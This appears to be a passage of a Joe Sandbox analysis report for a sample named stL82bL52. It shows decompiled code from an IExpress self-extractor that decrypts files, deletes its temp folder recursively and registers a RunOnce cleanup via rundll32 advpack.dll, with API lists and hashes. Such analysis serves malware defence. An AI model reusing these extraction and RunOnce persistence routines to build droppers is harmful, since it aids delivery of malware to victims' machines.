                                                                                                                                                                                                        								 *0x1fa288("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\", 0); // executed
                                                                                                                                                                                                        								_v276();
                                                                                                                                                                                                        								if(_t47 != _t47) {
                                                                                                                                                                                                        									_t40 = 4;
                                                                                                                                                                                                        									asm("int 0x29");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						FreeLibrary(_t36);
                                                                                                                                                                                                        						_t58 =  *0x1f8a24 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t58 != 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\"); // executed
                                                                                                                                                                                                        							if(_t21 != 0) {
                                                                                                                                                                                                        								__eflags =  *0x1f8a2c - _t44; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									__eflags =  *0x1f8d48 & 0x000000c0;
                                                                                                                                                                                                        									if(( *0x1f8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                        										_t41 =  *0x1f9a40; // 0x3, executed
                                                                                                                                                                                                        										_t26 = E001F256D(_t41); // executed
                                                                                                                                                                                                        										_t44 = _t26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t22 =  *0x1f8a24; // 0x0
                                                                                                                                                                                                        									 *0x1f9a44 = _t44;
                                                                                                                                                                                                        									__eflags = _t22;
                                                                                                                                                                                                        									if(_t22 != 0) {
                                                                                                                                                                                                        										L26:
                                                                                                                                                                                                        										__eflags =  *0x1f8a38;
                                                                                                                                                                                                        										if( *0x1f8a38 == 0) {
                                                                                                                                                                                                        											__eflags = _t22;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												E001F4169(__eflags);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t12 = 1;
                                                                                                                                                                                                        										goto L17;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags =  *0x1f9a30 - _t22; // 0x0
                                                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                                                        											goto L26;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t25 = E001F3BA2(); // executed
                                                                                                                                                                                                        										__eflags = _t25;
                                                                                                                                                                                                        										if(_t25 == 0) {
                                                                                                                                                                                                        											goto L16;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t22 =  *0x1f8a24; // 0x0
                                                                                                                                                                                                        										goto L26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t27 = E001F3B26(_t40, _t44);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t43 = 0x4bc;
                                                                                                                                                                                                        							E001F44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                        							 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t59 =  *0x1f9a30 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t59 != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E001F621E(); // executed
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t49 =  *0x1f8a24;
                                                                                                                                                                                                        				if( *0x1f8a24 != 0) {
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					_t34 = E001F3A3F(_t51);
                                                                                                                                                                                                        					_t52 = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E001F51E5(_t49) == 0) {
                                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t51 =  *0x1f8a38;
                                                                                                                                                                                                        				if( *0x1f8a38 != 0) {
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 001F2F93
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 001F2FB2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 001F2FC6
                                                                                                                                                                                                        • DecryptFileA.ADVAPI32 ref: 001F2FE6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 001F2FF8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001F301C
                                                                                                                                                                                                          • Part of subcall function 001F51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,001F2F4D,?,00000002,00000000), ref: 001F5201
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                        • API String ID: 2126469477-2099937843
                                                                                                                                                                                                        • Opcode ID: 8472cd1385e298c86fe59ad6dcbacd7fb8d7b7ab40189a4ac8d644eec6c69c62
                                                                                                                                                                                                        • Instruction ID: 4673398c301a23a9e7a7466019063323861d5d283c0ecf049a4a65062e532d2e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8472cd1385e298c86fe59ad6dcbacd7fb8d7b7ab40189a4ac8d644eec6c69c62
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F541BD71A0020D9ADB30BB75EC49B7A37A8EBA4750F000166FB55C39A1EF74CEC1CA61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E001F2390(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                        				_t21 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                        				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                        				_t65 = __ecx;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_pop(_t62);
                                                                                                                                                                                                        					_pop(_t66);
                                                                                                                                                                                                        					_pop(_t46);
                                                                                                                                                                                                        					return E001F6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E001F1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                        					_t58 = 0x104;
                                                                                                                                                                                                        					E001F16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                        					_t63 = _t22;
                                                                                                                                                                                                        					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t58 = 0x104;
                                                                                                                                                                                                        						E001F1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                        							_t58 = 0x104;
                                                                                                                                                                                                        							E001F16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                        							DeleteFileA( &_v280);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                        								E001F16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                        								_t58 = 0x104;
                                                                                                                                                                                                        								E001F658A( &_v280, 0x104, 0x1f1140);
                                                                                                                                                                                                        								E001F2390( &_v284);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                        					} while (_t36 != 0);
                                                                                                                                                                                                        					FindClose(_t63); // executed
                                                                                                                                                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,001F8A3A,001F11F4,001F8A3A,00000000,?,?), ref: 001F23F6
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,001F11F8), ref: 001F2427
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,001F11FC), ref: 001F243B
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 001F2495
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 001F24A3
                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 001F24AF
                                                                                                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 001F24BE
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(001F8A3A), ref: 001F24C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836429354-0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                        			E001F2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t7;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				struct HINSTANCE__* _t12;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				signed char _t19;
                                                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t4 = GetVersion();
                                                                                                                                                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t17 = _t21;
                                                                                                                                                                                                        							 *0x1fa288(0, 1, 0, 0);
                                                                                                                                                                                                        							 *_t21();
                                                                                                                                                                                                        							_t29 = _t24 - _t24;
                                                                                                                                                                                                        							if(_t24 != _t24) {
                                                                                                                                                                                                        								_t17 = 4;
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t20 = _a12;
                                                                                                                                                                                                        				_t18 = _a4;
                                                                                                                                                                                                        				 *0x1f9124 = 0;
                                                                                                                                                                                                        				if(E001F2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                        					_t9 = E001F2F1D(_t18, _t20); // executed
                                                                                                                                                                                                        					_t22 = _t9; // executed
                                                                                                                                                                                                        					E001F52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                        					if(_t22 != 0) {
                                                                                                                                                                                                        						_t32 =  *0x1f8a3a; // 0x0
                                                                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                                                                        							_t19 =  *0x1f9a2c; // 0x0
                                                                                                                                                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                        								E001F1F90(_t19, _t21, _t22);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t6 =  *0x1f8588; // 0x0
                                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                                        					CloseHandle(_t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 =  *0x1f9124; // 0x80070002
                                                                                                                                                                                                        				return _t7;
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,001F6BB0,001F0000,00000000,00000002,0000000A), ref: 001F2C03
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,001F6BB0,001F0000,00000000,00000002,0000000A), ref: 001F2C18
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 001F2C28
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,001F6BB0,001F0000,00000000,00000002,0000000A), ref: 001F2C98
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                        • API String ID: 62482547-3460614246
                                                                                                                                                                                                        • Opcode ID: 7d35b500493981ed54be68b7525b272e918442f2d7b1789c2cdc97a11fbcce97
                                                                                                                                                                                                        • Instruction ID: f0f3a3079792cff7cae33ffe1203112f047fdf520ef3b6812aa32521eb2158a1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d35b500493981ed54be68b7525b272e918442f2d7b1789c2cdc97a11fbcce97
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74118EB120030DABD720BBB5AC8AABE3769AB887A0B050025FB05D7651DB75DC82C661
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F6F40() {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(E001F6EF0); // executed
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x001f6f45
                                                                                                                                                                                                        0x001f6f4d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 001F6F45
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                        • Opcode ID: e6d61b903917e7bcdefa97e02637f2bd9cfe311e3407729170b8893fadf618e6
                                                                                                                                                                                                        • Instruction ID: 9a1e0287cd4457860519bff0dcf2ac7e88ef25ade882b7f34ad0a4ef78b8577d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6d61b903917e7bcdefa97e02637f2bd9cfe311e3407729170b8893fadf618e6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F99002A525510447D7105B709D1943579915F4D602BC25460A115C4895DB6440819512
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E001F202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				void* _v532;
                                                                                                                                                                                                        				int _v536;
                                                                                                                                                                                                        				int _v540;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				struct HINSTANCE__* _t46;
                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				void _t56;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        				intOrPtr* _t72;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				intOrPtr* _t81;
                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t79 = __edx;
                                                                                                                                                                                                        				_t28 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                        				_t84 = 0x104;
                                                                                                                                                                                                        				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                        				_t95 = _t94 + 0x18;
                                                                                                                                                                                                        				_t66 = 0;
                                                                                                                                                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					L24:
                                                                                                                                                                                                        					return E001F6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(_t86);
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E001F171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                        					_t95 = _t95 + 0x10;
                                                                                                                                                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                        					if(_t41 != 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t87 = _t87 + 1;
                                                                                                                                                                                                        					if(_t87 < 0xc8) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t87 != 0xc8) {
                                                                                                                                                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                        					_t79 = _t84;
                                                                                                                                                                                                        					E001F658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                        					_t84 = _t46;
                                                                                                                                                                                                        					if(_t84 == 0) {
                                                                                                                                                                                                        						L10:
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0x1f9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        							L17:
                                                                                                                                                                                                        							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							_pop(_t86);
                                                                                                                                                                                                        							goto L24;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						_t72 =  &_v268;
                                                                                                                                                                                                        						_t80 = _t72 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t49 =  *_t72;
                                                                                                                                                                                                        							_t72 = _t72 + 1;
                                                                                                                                                                                                        						} while (_t49 != 0);
                                                                                                                                                                                                        						_t73 = _t72 - _t80;
                                                                                                                                                                                                        						_t81 = 0x1f91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t50 =  *_t81;
                                                                                                                                                                                                        							_t81 = _t81 + 1;
                                                                                                                                                                                                        						} while (_t50 != 0);
                                                                                                                                                                                                        						_t84 = _t73 + 0x50 + _t81 - 0x1f91e5;
                                                                                                                                                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x1f91e5);
                                                                                                                                                                                                        						if(_t90 != 0) {
                                                                                                                                                                                                        							 *0x1f8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								_t54 = "%s /D:%s";
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        							E001F171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                        							_t75 = _t90;
                                                                                                                                                                                                        							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                        							_t79 = _t23;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t56 =  *_t75;
                                                                                                                                                                                                        								_t75 = _t75 + 1;
                                                                                                                                                                                                        							} while (_t56 != 0);
                                                                                                                                                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                        							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                        							RegCloseKey(_v532); // executed
                                                                                                                                                                                                        							_t36 = LocalFree(_t90);
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t79 = 0x4b5;
                                                                                                                                                                                                        						E001F44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                        					FreeLibrary(_t84); // executed
                                                                                                                                                                                                        					if(_t91 == 0) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        						E001F658A( &_v268, 0x104, 0x1f1140);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        				 *0x1f8530 = _t66;
                                                                                                                                                                                                        				goto L23;
                                                                                                                                                                                                        			}


































                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F2050
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F205F
                                                                                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 001F208C
                                                                                                                                                                                                          • Part of subcall function 001F171E: _vsnprintf.MSVCRT ref: 001F1750
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F20C9
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F20EA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 001F2103
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F2122
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 001F2134
                                                                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F2144
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 001F215B
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F218C
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F21C1
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F21E4
                                                                                                                                                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 001F223D
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F2249
